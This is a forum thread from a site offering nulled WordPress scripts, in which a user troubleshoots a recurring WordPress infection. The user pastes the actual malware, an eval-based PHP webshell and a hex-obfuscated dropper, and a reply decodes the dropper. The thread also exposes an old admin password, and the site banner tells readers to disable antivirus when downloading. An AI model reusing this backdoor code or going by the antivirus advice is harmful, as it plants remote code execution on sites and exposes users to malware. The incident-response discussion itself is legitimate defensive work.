• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Wordpress site hacked

Sebrof

Babiato Lover
Feb 13, 2019
My wordpress site just got hacked. I think I fixed all modified files but the malware keeps coming back. If I disable all cron entries in wordpress, it does not return but if I re-enable the cron, the malware comes back so, I'm thinking it is an entry hidden inside one of te crons. How can I view the actual code behind each cron so I can find this culprit?

SSH to your server and check
crontab -e (for your user)
crontab -u www-data -e (assuming www-data is your webserver user)
Also if you have wordpress cron jobs plugin installed you can see what jobs were added trough WP and test one by one

Or you can paste a screenshot of your cronjobs and you might be requested to post content of some files depending of cron job calls

Reactions: Ibibo
when i look at my cpanel, there are no cron entries. The only entries are the ones in wordpress.- here is all of them - sorry for multiple screen shots

1679528718005.png

1679528760018.png

1679528798775.png
1679528852091.png
1679528913185.png

You'll see that I have paused some of them trying to find the bad one. I'll un-pause, run it, then check to see if it's back. Each to find out, the malware leaves hidden files in the folders. Each hidden file (and there is a new ne created every day is named something like this: .1679419273

and has this code inside
<?php @eval($_HEADERS["Sec-Websocket-Accept"]);@eval($_REQUEST["Sec-Websocket-Accept"]);
It also infects numerous files hiding the code way off to the right so that a standard 80 character screen "hides" it.... the code is way off to the right: I'll see if I have a backup of one of the files they modified

Last edited:
here is one of the files:
<?php
$_HEADERS = getallheaders();
if (isset($_HEADERS['X-Dns-Prefetch-Control'])) {
$c = "<\x3f\x70h\x70\x20@\x65\x76a\x6c\x28$\x5f\x52E\x51\x55E\x53\x54[\x22\x49f\x2d\x55n\x6d\x6fd\x69\x66i\x65\x64-\x53\x69n\x63\x65\"\x5d\x29;\x40\x65v\x61\x6c(\x24\x5fH\x45\x41D\x45\x52S\x5b\x22I\x66\x2dU\x6e\x6do\x64\x69f\x69\x65d\x2d\x53i\x6e\x63e\x22\x5d)\x3b";
$f = '.'.time();
file_put_contents($f, $c);
include($f);
unlink($f);
}

it's been hacked twice.... the last time they completely wiped the site and unzipped a file called Adobe.zip so that the only files at the site were:
1679530018487.png

I had backups so it was easy to recover. I now have wordfence and securi installed

btw: he logs show tons of access to xmlrpc.php
It is now blocked but it looks like this is what was used to get in. It's been changed but, the old password was crf450(*

Not an easy password I think or so I thought. Changed now to a much harder password

here is one of the files:
Here is the file decrypted

1. PHP:
    $_HEADERS = getallheaders();
    if (isset($_HEADERS['X-Dns-Prefetch-Control'])) {
    $c = "@eval($_REQUEST["If-Unmodified-Since\"]);@eval($_HEADERS["If-Unmodified-Since"]);";
    $f = .time();
    file_put_contents($f, $c);
    include($f);
    unlink($f);
    }

Your old password is actually pretty easy to hack. I always set my passwords to a min of 30 (if site allows) alphanumberic & special characters (min 4 - never repeat).

If you have been hacked twice, I am guess there is an addon that is being hacked and if you are using any nulled scripts on a live site, IMO you deserve it. - Not trying to be a prick, but you should never run nulled files on a production server.

If you hosts allows you ssh access, that run this

Bash:
grep -rnw './public_html' -e 'search txt here'

The files are going off the 80 char screen because they put everything on 1 line of code (minimized) also, if you download the file and open in notepad, you will be able to edit the file with returns (enter key) to make it more readable.

if you are using any nulled scripts on a live site

You people have issues, misconceptions about nulled scripts.

What is a nulled script actually?
A script that it had removed its calls to developer server so it can be used without a license that developers add to it.

This doesn't change with anything the rest of script functionality. If developer is overestimated and code crappy scripts it's not nuller's fault. A nulled script is not an improved version of developer original script, it doesn't repair dev's mistakes.

Of course there are nullers that intentionally add malicious codes to their nulled versions. But up to now they were found and removed from Babiato. That's why we can proudly say we can offer almost 100% safety regarding nulling (except the versions we didn't get to check yet as updates are daily).

You people have issues, misconceptions about nulled scripts.

What is a nulled script actually?
A script that it had removed its calls to developer server so it can be used without a license that developers add to it.

This doesn't change with anything the rest of script functionality. If developer is overestimated and code crappy scripts it's not nuller's fault. A nulled script is not an improved version of developer original script, it doesn't repair dev's mistakes.

Of course there are nullers that intentionally add malicious codes to their nulled versions. But up to now they were found and removed from Babiato. That's why we can proudly say we can offer almost 100% safety regarding nulling (except the versions we didn't get to check yet as updates are daily).
I never stated where he got them from, not did he. I am still thinking on his, it is a bad/old plugin he is using. In my days of doing security on corp websites/network, this was a huge NO & still is. I have found the ones here a great, proper & clean & I use them in my testing environments, again, I would never run them on a live site, that is just me and I have been for over 35 years, even back in my good ol BBS Days.

@Sebrof each cron entry is attached to a plugin. You may get a copy of them on your local computer and check one by one.
Redownload all sources from where you got them then compare with the ones on your site.
If all are clear or identical with original downloaded files then get full wordpress folder and compare it with original version of wordpress downloaded from wordpress.org.
Somewhere a file has been edited to include malicious script that is running trough cron.

If you have been hacked twice, I am guess there is an addon that is being hacked and if you are using any nulled scripts on a live site, IMO you deserve it. - Not trying to be a prick, but you should never run nulled files on a production server.
Strange thing to here when you are on a site that offers nulled scripts? I'm guessing you must be here just to look but never download and install any of the plugins found here?

• Haha
Reactions: mr.t2d
The files are going off the 80 char screen because they put everything on 1 line of code (minimized) also, if you download the file and open in notepad, you will be able to edit the file with returns (enter key) to make it more readable.
already knew that

Strange thing to here when you are on a site that offers nulled scripts? I'm guessing you must be here just to look but never download and install any of the plugins found here?
Did you not read my post? I stated I run them in my testing environments

why run in a test if you are not going to actually use them.... I call BS
You can call BS all you want. I am not the one that got hacked twice.

I run them to try them out, if I like them, than I purchase them to support the authors.

AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock